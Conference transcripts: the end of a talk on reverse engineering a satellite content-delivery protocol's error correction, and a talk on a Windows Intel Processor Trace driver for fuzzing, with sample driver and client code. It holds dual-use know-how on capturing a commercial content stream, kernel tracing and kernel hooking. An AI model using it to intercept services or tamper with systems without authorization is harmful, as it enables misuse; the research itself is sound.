And you'll notice that the 2-by-2 part on the left of the matrix is all ones on the diagonal; it's called the identity matrix, and it'll prove very useful later on in the FEC scheme. Okay, so the two bytes that we want to protect are 1F and F7. I got these values from actual packets, and you can see that in figure 9 here. Now to do the math: I don't know how many of you remember how to do matrix multiplication, but I'd completely forgotten. As a quick review, you flip the 2-by-1 matrix on its side and leave the 2-by-3 matrix alone; you multiply the 2-by-1 matrix on the left with each row and end up with a 3-by-1 matrix. So to do the math, you multiply 1F by 1 and F7 by 0, and you follow this through for each of the three fields. In a Galois field, anything times 1 is itself and anything times 0 is 0, so that makes most of these easy to see: the first byte of the code word is 1F and the second is F7. For the last field, I'll give you some help: 1F times 3 in the Galois field is 21, F7 times 2 is F3, and 21 XOR F3 is D2. So D2 is the FEC value, the byte transmitted in the third packet. You'll also notice the great property that the first two bytes of the code word are the same as the original data, just because the left section is always the identity matrix, as I mentioned earlier. This is the case for any FEC data rate. It also means that all the bytes written to disk for a transfer won't have to be altered later. So now that we've been able to generate the FEC, the next question is: how do we get the data back out? Let's say, in our example from before, that we receive the first packet and the third packet and we've lost the second. Once we've got two packets' worth of the code word, we'll be able to regenerate the missing byte from the second packet. To do so, we need to build the repair matrix. We take the rows of the generator matrix for the packets we received and build a 2-by-2 matrix; in this case it'll be what you see here in figure 13. The one and the zero correspond to the first packet, and the three and two come from the generator matrix's third row. This matrix needs to be inverted to create the repair matrix; I'm going to spare you that trouble, and that's figure 14 there. This gives us A inverse, which is what we use to regenerate x_n. So now we multiply the two bytes that we have, 1F and D2, by A inverse. The math is the same as before, basic matrix arithmetic. Now, it's a very simple example, but that explains the process. I did numerous examples on paper before I was able to understand it well enough to do much in software. So now that I understood how the FEC process worked, I started to work on a software implementation. Luckily, since Galois field math is very standard computer science, it didn't take long to find some code online to build the multiplication and division tables. Once I did that, I wrote a few functions to reduce and invert the matrices. By this point I had all the mathematical tools in software and needed to weave them together to be able to do the FEC. For this part, I modified my software to stop stripping the FEC data off the files when I saved them. I collected a few examples of complete files with complete FEC repair sections, and since I should be able to generate the FEC sections as well as the repair data, my first step was to write software to verify the FEC data in the saved files.
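For anyone who wants to check the arithmetic in that worked example, a small GF(2^8) multiply in C, reducing by the 0x11D polynomial, reproduces the numbers. This is generic finite-field code, not the speaker's implementation.

    #include <stdint.h>
    #include <stdio.h>

    /* GF(2^8) multiplication, reducing by x^8 + x^4 + x^3 + x^2 + 1 (0x11D). */
    static uint8_t gf_mul(uint8_t a, uint8_t b)
    {
        uint8_t p = 0;
        while (b) {
            if (b & 1)
                p ^= a;                 /* addition in GF(2^8) is XOR */
            b >>= 1;
            a = (a & 0x80) ? (uint8_t)((a << 1) ^ 0x1D) : (uint8_t)(a << 1);
        }
        return p;
    }

    int main(void)
    {
        uint8_t d0 = 0x1F, d1 = 0xF7;
        /* Third code-word byte from the 2x3 example: 3*d0 + 2*d1. */
        uint8_t fec = gf_mul(d0, 3) ^ gf_mul(d1, 2);
        printf("1F*3=%02X  F7*2=%02X  FEC=%02X\n",
               gf_mul(d0, 3), gf_mul(d1, 2), fec);   /* 21, F3, D2 */
        return 0;
    }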
It didn't take very long to implement this in software for files that consisted of fewer than 100 packets, but after that I ran into problems with files of 101 or more packets. I made the assumption that 100 must not be some arbitrary limit, and that the programmers had decided on it for some reason. It turns out that after 100 packets, the packets are interleaved, so that 100-by-X is the largest scheme. The interleaving rate was easy to calculate, based on the total number of packets divided by 100, and any packets that weren't present to get to an even 100 were just considered all zeros. All of these little things necessary for a complete implementation were easy to test in software, with complete files and FEC sections to test against. So by now I was elated that I was able to repair bad files, but I was still not totally sure what the FEC rate would be. I could make some assumptions based on the total file sizes, but I took a look back at the myriad of unknown sections in the 03 packets from much earlier, and sure enough, there was a field that correlated with the FEC data rate. It was a 32-bit field after the filename. The only reason it wasn't obvious was that it was stored as the FEC value times 100: if the FEC scheme was 100 by 106, the field would be 10,600. Once I had this last piece of information, it was time to try to do it in real time on the live stream. The time it takes to build a generator matrix, which is the basis of the repair matrices, is quite short for the 2-by-3 example I just presented, but with the larger FEC rates that are used in the field, such as 100 by 109, it takes much longer. So I pre-calculated the generator matrices and stored them in a header file that was compiled into the executable; I only stored the section of the generator matrix to the right of the identity matrix. And once I implemented the FEC, I was able to emulate, as far as I can tell, the entire protocol. If I ran into any I/O errors, the FEC was able to repair these short bursts. So in conclusion, the biggest challenge of the project for me was the FEC, since the math was something I never really dealt with in my schooling, aside from remembering it long enough to pass a test. I'm sure you'll be wondering about the video-on-demand system and whether it's still running. The system is running, but all the files are now encrypted using some sort of scheme based on AES-256. So hopefully I've explained all this in a way that's easy to understand, and thank you for listening to my presentation. [Audience question] So once you've applied all the error correcting stuff, what proportion of the data stream were you able to decode successfully?
|
The presentation will cover reverse engineering a satellite-based IP content delivery system. These systems are generally used for moving digital media (such as movies and video on demand) but can also be used for digital signage and any other type of files. The presentation will touch on all aspects of the reverse engineering, from satellite reception, packet analysis, and forward error correction reverse engineering (along with an explanation of the math), to the difficulty of dealing with the extremely constant high bitrates on an off-the-shelf Linux PC. The end result of the entire reverse engineering project was a Linux-based software client that has similar features to the commercial version, based solely on an analysis of the protocol and incoming data.
|
10.5446/32382 (DOI)
|
Okay, before we start, a brief introduction about us. I'm Andrea Allievi, a security research engineer at Microsoft. I have worked for three years on the TALOS team, and I'm specialized in Windows internals and low-level reverse engineering. I previously worked for Prevx, Webroot and Saferbytes, companies located, at least in part, in Italy. I'm the original designer of the first UEFI bootkit, in the year 2012, and of the first PatchGuard 8.1 bypass, presented in the year 2014. I'm one of the designers of the Windows PT driver that we are going to present. And I'm Richard Johnson, the research technical lead for Cisco TALOS. We have a team that does vulnerability research, and I help guide those efforts. You may have seen some of our vulnerabilities in the past year, and we focus mostly on technologies for finding bugs. So, as he mentioned, some of my talks the last couple of years at recon have focused on high performance applied to fuzzing, and on engineering technologies that give us feedback-driven fuzzing and componentize the different parts of the process to try to make it as fast as possible. I came across this new architectural feature in Intel CPUs called Intel Processor Trace about two years ago; basically it's a hardware-supported mechanism for doing code coverage, and I made a prototype for this in 2015 that worked for Linux, because there was experimental support via some open source drivers. After evaluating it, I realized that this would be a great thing to bring to the Windows operating system, but the Intel support for it was not going to be suitable for what we were looking for. So last year at recon we had our very first version of the Windows driver working, like an hour before we got on stage, and it was doing a raw decode. We're going to talk about the last six months of development, which have brought all kinds of support to the driver, and this picks up where the last talk left off. Andrea is going to give you the introduction to the technical details of the driver, the low-level implementation, and some demos, and then we'll address that as applied to fuzzing and finding bugs. Okay, speaking about Processor Trace: Processor Trace is a new feature of the latest Intel Skylake CPUs. It's very useful because it can trace, in hardware, whatever your CPU is going to execute, and it has some particular benefits, especially for dynamic code coverage; for example, if you would like to understand what a particular piece of software does, for malware analysis or whatever. The uses are various. Because we don't have a lot of time, I would like to be quite fast in describing how Intel PT works in the CPU, and to concentrate on the new features of our driver. Basically, discovering Intel Processor Trace support on a CPU is quick, and you can do it even in user mode, just by emitting two CPUID instructions with two different leaves: one is used to detect support for Intel Processor Trace, and the second one is used to detect the features of Processor Trace, because different CPUs can implement different features. Processor Trace was implemented for the first time in the Broadwell architecture, but it was limited; now in Skylake there is full support and you can trace whatever you would like, and the CPUs Intel will release in the second quarter of 2017 carry it as well. Okay, here in this slide I would like to show the code for detecting Processor Trace.
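The slide with the detection code isn't reproduced in this transcript; as a stand-in, a minimal user-mode check along the same lines (my own sketch, not the driver's actual code) looks like this:

    #include <intrin.h>
    #include <stdio.h>

    int main(void)
    {
        int r[4];

        /* CPUID.(EAX=07H,ECX=0):EBX[bit 25] indicates Intel PT support. */
        __cpuidex(r, 0x07, 0);
        int has_pt = (r[1] >> 25) & 1;

        /* CPUID leaf 14H enumerates the PT capabilities (CR3 filtering,
         * ToPA output, IP filtering ranges, and so on). */
        int caps[4] = { 0 };
        if (has_pt)
            __cpuidex(caps, 0x14, 0);

        printf("Intel PT: %s  (leaf 14h EBX=%08X ECX=%08X)\n",
               has_pt ? "supported" : "not supported",
               (unsigned)caps[1], (unsigned)caps[2]);
        return 0;
    }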
As you can see, it is quite easy; there is nothing special, only a pair of CPUID instructions. Okay, let's speak about why it is so interesting. It is because it is implemented entirely in hardware. One of the basic things we can say about this is that it is not detectable by software, I mean by user-mode software. One important thing to say is that you can trace whatever you want: even SMI/SMM handlers, even hypervisor code, or whatever. The only thing you can't trace is an SGX secure container, but that is fine, because SGX by design should work in an isolated environment. Okay, quickly, how it works. Processor Trace works in three modes; it can trace using three different kinds of filtering. The first is by current privilege level, meaning you can differentiate between kernel-mode software and user-mode software. The second filtering mode is by PML4 page table: in that way you can trace only a single process, because you can instruct Processor Trace to trace only a specific PML4 page-table physical address. The last filtering mode is by instruction pointer: you can set a start point and an end point and ask Processor Trace to trace only that window of code, which is very cool. The output logging is done directly in memory, in physical memory; that's why we need a driver to manage it. The logging can be implemented in two ways. The first one is single range: there is a circular buffer, and the trace is always written to the same place in memory. The second type is the Table of Physical Addresses, also known as ToPA. Again quickly: to implement single range you should allocate a contiguous physical memory buffer, and then you should set the proper model-specific registers, the RTIT output base and the RTIT output mask pointers. Then you have to start the trace by setting the TraceEn flag in the control register. The buffer is automatically filled in a circular manner by the CPU. The Table of Physical Addresses is a better implementation of the output, because you can set various physical memory addresses and create a table in which you instruct the CPU exactly where to write. It's very smart, because you can even set up a PMI interrupt that is raised by the CPU when a certain part of the buffer is filled by the log, and then you can stop, you can resume, you can do whatever you want. Okay, the different kinds of packets. To log the software execution, Processor Trace uses different kinds of trace packets. There are a lot of timing packets that we are not interested in. The packets we are interested in are the branch packets: the Taken/Not-Taken, Target IP, and Flow Update packets. Those packets are the most interesting, because with them you can trace the execution of the software and follow it, maybe even checking the assembly code. Here is a big diagram; I will refer you to the Intel manual if you would like to understand the nitty-gritty details of each packet. The ones we are interested in are the branch packets: Taken/Not-Taken, Target IP, and Flow Update. Okay, let's speak about the Intel PT driver implementation. We decided to write this driver to be able to perform the trace directly from a Windows operating system. At the time of this presentation, the driver is quite stable, at version 0.5.
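Going back for a moment to the single-range setup just described: a rough kernel-mode sketch of that MSR programming might look like the following. The MSR indices and bit positions are quoted from memory of the Intel SDM and should be verified there; this is an illustration, not the driver's code.

    #include <ntddk.h>
    #include <intrin.h>

    /* MSR indices and control bits as I recall them from the Intel SDM; verify there. */
    #define MSR_IA32_RTIT_CTL              0x570
    #define MSR_IA32_RTIT_OUTPUT_BASE      0x560
    #define MSR_IA32_RTIT_OUTPUT_MASK_PTRS 0x561

    #define RTIT_CTL_TRACEEN   (1ULL << 0)
    #define RTIT_CTL_USER      (1ULL << 3)   /* trace CPL > 0 (user mode)  */
    #define RTIT_CTL_BRANCHEN  (1ULL << 13)  /* emit branch (COFI) packets */

    /* Point single-range output at a physically contiguous, size-aligned,
     * power-of-two buffer (at least 128 bytes) and start tracing on this CPU. */
    VOID PtStartSingleRange(PHYSICAL_ADDRESS BufPa, ULONG SizePow2)
    {
        __writemsr(MSR_IA32_RTIT_OUTPUT_BASE, (ULONG64)BufPa.QuadPart);
        /* Low half is the size mask, high half is the current write offset (0). */
        __writemsr(MSR_IA32_RTIT_OUTPUT_MASK_PTRS, (1ULL << SizePow2) - 1);
        __writemsr(MSR_IA32_RTIT_CTL,
                   RTIT_CTL_TRACEEN | RTIT_CTL_USER | RTIT_CTL_BRANCHEN);
    }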
It supports all the filtering mode combinations and output modes. Some new features of this release are that it supports multiple processors, and it supports even kernel-mode code tracing. As I have told you, you can use Processor Trace to trace even kernel software without any problem. In developing this driver we had to overcome a lot of problems. One of the biggest problems was the handling of the PMI interrupt, because there was no documentation at all on how to do that. Another was multi-processor support, because you have to manage and enable Processor Trace once on each processor. Okay, let's speak first about the PMI interrupt. The PMI interrupt is raised by Processor Trace when our buffer is full. To achieve that, we have programmed the Table of Physical Addresses by inserting the PMI interrupt request at the end of the buffer. How can we manage that? When the PMI interrupt is raised, we suspend the target process, dump the physical memory, and then resume. We had some problems implementing this because, as you probably know, all the interrupts in the x86 architecture run at a very high IRQL. This is quite a problem, because from that code you can't just do anything you like. Regarding the user-mode buffer, very quickly: we have found a way to directly map the physical memory into a user-mode buffer. We do this in a smart manner; we respect the security boundaries, and we map only the log buffer, nothing kernel-mode, into user mode. This is important because if you use a very big buffer you could have a problem with the virtual address space, although that's not really a problem on 64-bit systems. Okay. Here is where things get interesting, because in version 0.5 we have been able to support multiprocessor and multi-threaded applications. We have implemented it so that each CPU has its own buffer associated with it, mapped in user mode, and a PMI interrupt is signaled when that buffer gets filled. But here there is a problem: if we fire the PMI interrupt in the same old way, the user-mode application is not able to detect, in a fast enough, real-time way, which CPU has its buffer full. So we switched the implementation to user-mode callbacks: our user application spawns one thread for each CPU, and each thread registers a PMI callback function, so that when a CPU has its buffer full, exactly the right user-mode callback is called. We have tested that even in a really big multiprocessor environment, if we don't decode the binary log in real time to transform it into human-readable text, the performance is really good; we don't see any slowdowns or anything in the traced application. In summary, we have overcome this problem, but the remaining problem is managing a multi-threaded application, because as you already know, from the CPU's point of view a thread doesn't exist: the CPU is just executing some code, and it doesn't know whether that code belongs to one thread or another. If you try to launch calc, the standard calculator in Windows 10, you will find that it's not a standard process; it's a new AppContainer process that spawns another process. This is an example of the increasing complexity of even standard processes, which spawn other processes or are multi-threaded. This can be a problem for our tracing purposes.
To overcome that, we can identify the paging information packets of each process and use Processor Trace without instructing it to filter by CR3. But we have a big drawback, because that way you trace all the processes that run in user mode, all the loader code, whatever, and the size of the log is huge. This is a problem. The second way to overcome this could be to register a process-creation callback in kernel mode and then trace only one process at a time. This solution is simple and it works, but sometimes it's not acceptable because, for example, some complex components, like Microsoft Word, require interaction between different processes. This is a problem. But we are researching a new way to do this, because originally we would like to enable Processor Trace per thread, using the thread as the unit of tracing. A thread is known only in software; only the Windows kernel knows how to manage threads. Our original idea was to intercept the thread context-switch code and manually save all the model-specific registers used by Processor Trace to an area, then restore them when the context switcher restores the original thread. When I was doing this, I was manually saving all the model-specific registers to an external buffer, but someone pointed me to the existence of another very cool instruction that is not well known in the research community but is very useful. Do you remember the old PUSHAD instruction in the x86 architecture? Basically, what it does is push all the general-purpose registers onto the stack using only one instruction. Now, in a 64-bit environment something like that doesn't exist anymore, but Intel has made this new cool instruction called XSAVE. XSAVE is an opcode in the AMD64 instruction set that basically saves some extended registers, registers that belong to the Intel architecture, to a specific memory area. I have found that the XSAVE instruction can save the MMX, SSE, AVX, and AVX-512 registers (I wrote here "what is AVX-512?" because I didn't know it existed). The cool feature of XSAVE is that it can even save the registers that belong to Intel Processor Trace and to the new Intel Memory Protection Extensions. And it is very cool, because using only one instruction we can save all the registers that belong to Processor Trace directly, in a very, very fast manner, without any problem. If you open the Intel manual you will find that using this instruction is a bit complex, because there is an XSAVE instruction that belongs to user mode, and to select what to save you have to set an extended control register using a new instruction called XSETBV. But to be able to save the model-specific registers directly, you have to use another instruction: XSAVES, which means XSAVE supervisor, and it is meant to be used in kernel mode. Our driver completely supports XSAVE. And it was very funny, because when I implemented this I found that the new Windows 10 context switch already implements support for XSAVE, but only for the user-mode state. Our original intention was to find a way to intercept or divert the KiSwapContext routine, which is the kernel-mode routine that Windows uses to perform the context switch from one thread to another. If we are able to intercept this, we can save all the model-specific registers that belong to Processor Trace directly to an area and then restore them later.
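For illustration only, that supervisor-state save and restore might look roughly like this. The IA32_XSS bit for the PT state (bit 8) and the _xsaves64/_xrstors64 intrinsics are quoted from memory and should be double-checked; real code would run this inside the context-switch path at the proper IRQL.

    #include <intrin.h>

    /* Supervisor state components are enabled in IA32_XSS (MSR 0xDA0); bit 8 is
     * the Intel PT ("trace packet configuration") state, as I recall from the SDM. */
    #define MSR_IA32_XSS  0xDA0
    #define XSS_PT_STATE  (1ULL << 8)

    /* 64-byte aligned XSAVE area; real code sizes it via CPUID leaf 0DH. */
    __declspec(align(64)) static unsigned char PtXsaveArea[4096];

    void PtSwapPtState(void)
    {
        /* Opt the RTIT MSR state into XSAVES/XRSTORS (done once per CPU). */
        __writemsr(MSR_IA32_XSS, __readmsr(MSR_IA32_XSS) | XSS_PT_STATE);

        /* One instruction saves all the PT MSRs of the outgoing thread... */
        _xsaves64(PtXsaveArea, XSS_PT_STATE);

        /* ...and one restores them when that thread is scheduled back in. */
        _xrstors64(PtXsaveArea, XSS_PT_STATE);
    }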
In that way we can implement tracing by thread, which lives at a completely software level. But we found some problems, because as you probably know you can't touch kernel-mode code in an unofficial way — using for example a hook, a code diversion or whatever — because otherwise PatchGuard will blue screen your system. And we found that this approach is not feasible on a production system; we can only use it on our debug systems. In a debug environment you can do that, PatchGuard doesn't run and it's not a problem, but it's not a viable way on a production system. The second solution that we found is the usage of ETW. If you check the documentation about ETW there is a way to intercept the context switcher, but we are still doing some research because the APIs are very complex and we are trying to figure out whether we can use ETW in a legitimate way to implement tracing by thread. Another cool feature of the new release is that the driver now fully supports kernel-mode tracing. We have implemented 11 new kernel APIs that you can use from your own driver to decide manually what to trace, how to trace it, and whatever else you like from kernel mode. But we were not happy with this, because we would like to drive the tracing even from a user-mode application. So we have created some IOCTLs through which you can communicate with our driver, and it is able to do kernel tracing directly from user mode. To do this we had to overcome a lot of security problems, but now you can do that: from a user-mode application you can even trace kernel code. I wrote here that in this way we are able, for example, to trace the loading or unloading of a kernel module, or, if maybe you are studying some IOCTL handler in a rootkit or whatever, you can trace only the IOCTL code, because as you know IOCTLs in the kernel are processed synchronously when a user-mode application issues them. Okay, some quick words about how to use the driver. As you can see the code is quite simple. First of all you have to grab a handle to our device; it's quite easy, the device is named WindowsIntelPtDev. After that you have to fill a data structure named PT_USER_REQ, which is our request, and then you ask the I/O manager to send the IOCTL to our device with the user request. After this, the trace starts. You can decide when to stop the trace using another IOCTL. This is very important, because if you close the application without doing that it means that your processor is still tracing something, and this could lead to a problem if you try to unload our driver, because the processor state is not cleared. The driver is able to detect this and to recover from it, but it's good practice to stop the trace. For multi-processor tracing you can spawn one user-mode thread per CPU without any problem, and then from each user-mode thread you call the I/O manager to send the register-PMI-routine IOCTL to our device. That's all. Then you wait in an infinite loop. The only thing to take care of is that there is a parameter of the SleepEx function named bAlertable: you have to set it to TRUE. That way, every time the CPU buffer gets filled, the callback will be called without any problem. Now it's time for a demo. I don't know how much time we have; we have to be very fast. I have prepared a demo for you. As you can see, there is the code of a very simple application. It only asks some questions to the user. Let's try to run it.
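For reference, the call sequence just described boils down to roughly the following sketch, written here in Python via ctypes. The IOCTL codes, the PT_USER_REQ layout and the exact device path are placeholders inferred from the talk, not the driver's real definitions, so treat this purely as an illustration of the ordering: open the device, start the trace, wait alertably, stop the trace.

    import ctypes
    from ctypes import wintypes

    kernel32 = ctypes.windll.kernel32
    kernel32.CreateFileW.argtypes = (wintypes.LPCWSTR, wintypes.DWORD, wintypes.DWORD,
                                     wintypes.LPVOID, wintypes.DWORD, wintypes.DWORD,
                                     wintypes.HANDLE)
    kernel32.CreateFileW.restype = wintypes.HANDLE

    GENERIC_READ, GENERIC_WRITE, OPEN_EXISTING = 0x80000000, 0x40000000, 3
    DEVICE_PATH = r"\\.\WindowsIntelPtDev"     # device name as described in the talk
    IOCTL_PT_START_TRACE = 0x0022E004          # placeholder code, not the real one
    IOCTL_PT_STOP_TRACE = 0x0022E008           # placeholder code, not the real one

    class PT_USER_REQ(ctypes.Structure):
        # Placeholder layout; the real request also carries the filtering options.
        _fields_ = [("dwProcessId", wintypes.DWORD),
                    ("dwBufferSize", wintypes.DWORD)]

    def send_ioctl(hdev, code, request=None):
        returned = wintypes.DWORD(0)
        in_buf = ctypes.byref(request) if request is not None else None
        in_len = ctypes.sizeof(request) if request is not None else 0
        if not kernel32.DeviceIoControl(hdev, code, in_buf, in_len,
                                        None, 0, ctypes.byref(returned), None):
            raise ctypes.WinError()

    # 1. Grab a handle to the device.
    hdev = kernel32.CreateFileW(DEVICE_PATH, GENERIC_READ | GENERIC_WRITE,
                                0, None, OPEN_EXISTING, 0, None)

    # 2. Fill the request and start tracing the target process.
    send_ioctl(hdev, IOCTL_PT_START_TRACE, PT_USER_REQ(1234, 64 * 1024))

    # 3. Per-CPU threads would register their PMI callback (another IOCTL) and
    #    then wait alertably so the callback can be delivered.
    kernel32.SleepEx(5000, True)               # bAlertable = TRUE

    # 4. Always stop the trace before exiting, so the processor state is cleared.
    send_ioctl(hdev, IOCTL_PT_STOP_TRACE)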
No kernel trees. Target process is our simple application. Andrea, you can see here. Just a moment. How many CPU? At the beginning let's do one. Only one CPU. He is asking you to increase the font size. You can mirror it. While he is setting this up I will recap what he went over. When we presented it last year in June all we had shown is the raw code. He is going to show you a tracing in different modes and visualizing it in IDA. How many conferences have you attended? Let's say three. The application has ended saying you are on a good track. Let's exit and try to open the executable using IDA. Here is the code. Our goal is to trace the software. We have developed IDA plugin that does this for us. Let's feed it with the text log. Wait a moment. An exception. As you can see, this is exactly the code that it has run. The exception was not voluntary. We use a library from Intel called lib.ipt. It provides the decoding of the binary trace to a text file that we are parsing in the plugin for right now. Later we will integrate the decoding within the plugin. I would like to show you the same with the multi-processor environment. Let's see where is the part of my process. How many processors? Four. Now let's say eight conferences. The results are different. You can see in the summary each processor has its own buffer with different number of packets. It is this dump. As you can see, there are different binary files and text files for each processor. Now we will increase the font size. Can you see guys? As you can see, this is CPU number one. It has all the packets, the taken not taken and the paging, paging generation, enable and disable. Because the context switcher of Windows switch to different threads. This is one CPU. But for example, if you are lucky, we are not lucky. There is even some logs that are quite clear because it means that the Windows has executed these executables only for a small period of time. This is not the case because luckily the context switcher runs for each different CPU. But sometimes it happens that even the log for one processor is empty. And this is our implementation. Can you pull up one of those text files again? Okay. I just wanted to point out. So when you read these text files, you can see that for indirect branches and return addresses, we actually get the full 64-bit target address. But if you look at the TNT packets, those are indicating whether or not a conditional branch was taken. So they only store a single bit that determines whether or not you took the true or false branch. So you have to recover that later on and disassemble in real time to recover what the target addresses were for those conditional branches. We have time. Yeah. I would like to show you an experimental demo that uses kernel tracing directly for user mode. For this demo, I have chosen ACP driver, not for a specific reason, because it was randomly chosen. And I found that the system calls this interface a lot of times. Let's try to do even this, to take even those dumps. The explorer has been blocked. Amazing. Okay. Let's say yes, ACPI.cs. Let's say go, number of process of CPU, just one from this time. Okay. It asks, I'm tracing, do something and then stop me. I do, for example, some movement on my PC. And then at a point of time, I will say stop. In this time, we were quite lucky because, as you can see, the process on number one has taken some packets. Let's see what are those packets. Okay. 
As you can see, there is not so a lot of time, a lot of things registered here, but something has been taken. Let's try to use our plugin to be able to trace what you can see. This is the code of ACPI. Unfortunately, I have no symbol about this because it's an in-flight release of Windows 10. But let's try. Okay. The plugin has worked. You can see now because the driver entry has never been called, has been already called when you have switched on your system. But if you see the log, there is a lot of time called this special function. That could be an IOCTL or whatever. Let's try to go. Yes, this is IOCTL. You can see. Just a moment. This should be blindly without knowing anything about the interface of the driver. We can probably say that this is an IOCTL because the code is executed a lot of times because for the color, the color is darker. It means that the CPU has executed this function a lot of times. As you can see, there are traces of all the branches. This is... Ah, come on. It's not taken. And you can see there is the branch. And all the branches are traced. And that is the demo about the kernel tracing from user mode. From kernel mode, if you develop your driver, you are even being able to trace the driver entry or driver unload routine. I can show that right now because first we don't have time and second, my computer is switched on in a relay's environment. Because for doing that, of course, we can't use a signet driver. But it's feasible. If you do that, if you write your kernel driver and you sign your kernel driver, you can do whatever you would like. Okay, let's write it back today. So now we'll switch. Oh, okay, yes. So yeah, to recap, the driver now supports kernel tracing and user mode tracing. You can filter based upon the CR3, so a single whole process. You can trace the entire kernel space or you can isolate ranges of contiguous IP. And you get up to four different ranges. So now I'm going to demonstrate this in a practical real world scenario inside of AFL. So we have this fast tracing engine and you'll see some performance numbers that are real world here. But in the manuals, they are targeting a 5 to 15% trace overhead for the entire system. So per core, you should be able to trace both kernel mode operations and user mode operations for only 5 to 15%. And I'll actually be able to show you that and how that works. I'm sorry. Yes, yes. Oh, I'm sorry. That will help. That's one. Yes. Okay. So how do we use this and apply it for vulnerability discovery? So who here is familiar with American Fuzzy Lop? Has used it? We have people who do fuzzing in the crowd. Okay, a good portion here. So in the last few years, we've seen, well, an evolutionary jump in fuzzing technology. Basically, we've gone from using dumb fuzzing or grammar-based fuzzing that wasn't able to determine whether or not the samples that were being generated were useful to applying a new technology or engineering an older technology into something that's performant enough to be used. And we call that evolutionary fuzzing. So we take the idea of dumb fuzzing mutation and we combine it with the ability to collect a feedback signal using code coverage. And then we assess the fitness of that new randomly generated input against the entire lifetime of your fuzzing cycle. And so basically what we can do is we can look at this code coverage information, determine if this newly generated input actually gets us to a different part of the code. 
If it does, then we'll introduce that into our entire pool of samples and continue to mutate and fuzz those as we go. So over time, we're refining our set of inputs and getting, we're building a corpus and each one of those inputs exercises a slightly different part of the code. And in effect, what we've seen is the last three or four years since this has been available, this has highly optimized your compute time when it comes to doing dumb fuzzing. And so the last couple of talks I've given have focused on this technology. And so I encourage you to go look at previous slide decks which are on the recon website or my website at moflo.org. But basically through researching this, I've resolved that the main things that we need to effectively deploy this technology is we need a fast tracing engine. And of course, that was the inspiration to look into Intel processor trace because the promise of 15% overhead against closed source binary software is pretty incredible compared to the technologies that we've had available before. Previously, hardware tracing is not new to Intel. Since the P4, there's been the ability to do hardware tracing. There's mechanisms called branch trace store, BTS, which is works in a similar fashion, but was not designed in a way that was optimized. It didn't write to physical RAM. It polluted your cache and things like that. So we saw a massive slowdown. And then you have another option which is called last branch record, which is only 32 registers and modern processors. And those only give you the last 32 branches. So you'd have to interrupt every time every 32 branches to parse that and use that. And or you'd have to write a driver that flushes that out to a different cache and do other things. So while this isn't new, this is designed for the first time to be highly performance up until Intel processor trace. It was actually faster to use software based tracers, things that would do dynamic binary instrumentation using Dynamo Rio or PIN or something like that. So now we have this fast tracing engine. That's great. We need fast logging, which is something that we get out of the design of AFL. AFL uses a bloom filter that allows you to quickly look up whether or not you've done the same code coverage. So instead of parsing a text file or binary file, that's just a list of addresses of basic blocks consecutively. We actually parse that real time and fill a bloom filter. So you can just check to see if this 64k of RAM is identical to another 64k of RAM instead of doing a comparison of each address. And then through some of my other research, there's been other attempts at evolutionary fuzzing starting about 2004 or 2005. Jared DeMott did some of his PhD research on this, and he had something called the evolutionary fuzzing system. But it was based upon basically the BTS record or debugger breakpoint. So it was quite slow in its tracing. And then it was also over engineered and trying to incorporate too much of the research that's in evolutionary, like, biology side of things. So the key is to have this fast tracing engine efficient logging and to keep the analysis to the minimum. So in 2013, Michael Zolesky, who's contributed a lot of great stuff to our industry, produced the first performant open source evolutionary fuzzer called American Fuzzy Lot. It uses a pretty comprehensive list of types of fuzzing strategies, whether it's bit flipping, byte flipping, d-word flipping, and so on, crossovers, and various types of mutation. 
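As a flavour of what the simplest of those strategies amounts to, a single bit flip over the sample buffer is only a few lines of Python — a generic illustration of the idea, not AFL's actual C implementation:

    import random

    def bitflip(sample: bytes) -> bytes:
        # Flip one randomly chosen bit of the input and return the mutant.
        buf = bytearray(sample)
        pos = random.randrange(len(buf) * 8)
        buf[pos // 8] ^= 1 << (pos % 8)
        return bytes(buf)

    print(bitflip(b"GIF89a").hex())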
It uses, originally it used block coverage via a plugin, a post process of the GCC compilation. It would compile your code to assembler and then annotate the assembler to add callback hooks at every basic block entry point. And then that's, through that modified source code, that's how you got your code coverage. And then, as I mentioned, he takes those edge transitions, basically shifts and zoars them together, and then increments offsets into this bloom filter or byte map that is basically able to track, you know, whether or not you've seen this edge before. Now, you can't get out what those addresses were originally because it's simply an offset into this mapping, but you can very quickly look up, have I been here before? And that's all we care about as far as whether or not to keep that sample. And then, of course, it was written on top of the POSIX API, so it wasn't Windows-compatible out the gate. The benefits that it has, it tracks edge transitions and not just block entry. It uses the bloom filter. It had a fork server built into it. And then, basically, after your process has initialized, it waited until all your libraries are loaded and all the linking and everything is done. And then once you get to the parser code, then it would fork. And so, you skip all that initialization time, which is an optimization. And then, very importantly, he introduced persistent mode fuzzing, which is an in-memory type of fuzzing where you're not exiting and recreating the process every time. So, you're giving it a pointer to a function and the number of arguments to that function and saying, okay, once you exit this section of code, start over again and take our new inputs as inputs to this function. And so, that also reduces the amount of code that you're tracing and executing down to the minimal points as an optimization. And then, importantly, you can use this to build a corpus on open-source software. It's very fast, and so you can use those as inputs into your pipeline on maybe slower or more heavyweight analysis on other types of fuzzing. So, the way they do their tracing is every block gets a unique ID. The edges are indexed in that map. It creates that hash using the shift and zore, and then we increment the map. So, this was great. I was looking into this and how to optimize this and bring this to the Windows platform. Obviously, we can't use source code instrumentation for the majority of the software that we're targeting, so we needed something that could do binary targeting. And so, this seemed ideal versus the other options of using PIN or Dynamo Rio and so on. And so, last summer, we decided to start looking into this. Well, around that same time of my talk at Recon last year, Ivan Fratric from Google, I think he's Project Zero or Google Security, released Win AFL, which was a port of Michael Zeweski's AFL to Windows using Dynamo Rio as a backend. Are you guys familiar with PIN or Dynamo Rio? They're basically loaders for your program, and as you visit each new basic block of code, it caches that and allows you to modify it in real time. So, it's a kind of, Valgrind works the same way if you're familiar with that. So, it was using that as a backend. It's really cool. It works. It was like the first thing that you could just go download right now and start fuzzing Windows GDI in five minutes. Beautiful. The biggest thing that's allowed it to be a performance is that it uses this persistent mode where it doesn't exit the process. 
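Before moving on to those loaders, here is the shift-and-XOR bookkeeping described a moment ago, restated in a few lines of Python. AFL itself does this in C inside the injected instrumentation; only the 64 KiB map size below matches its default, the rest is simplified.

    MAP_SIZE = 1 << 16                  # AFL's default 64 KiB coverage map
    trace_bits = bytearray(MAP_SIZE)    # one byte per edge bucket
    prev_loc = 0

    def record_block(cur_loc):
        # cur_loc is the pseudo-random ID given to the basic block at
        # instrumentation time; the edge prev -> cur is hashed by XOR.
        global prev_loc
        idx = (cur_loc ^ prev_loc) % MAP_SIZE
        trace_bits[idx] = (trace_bits[idx] + 1) & 0xFF
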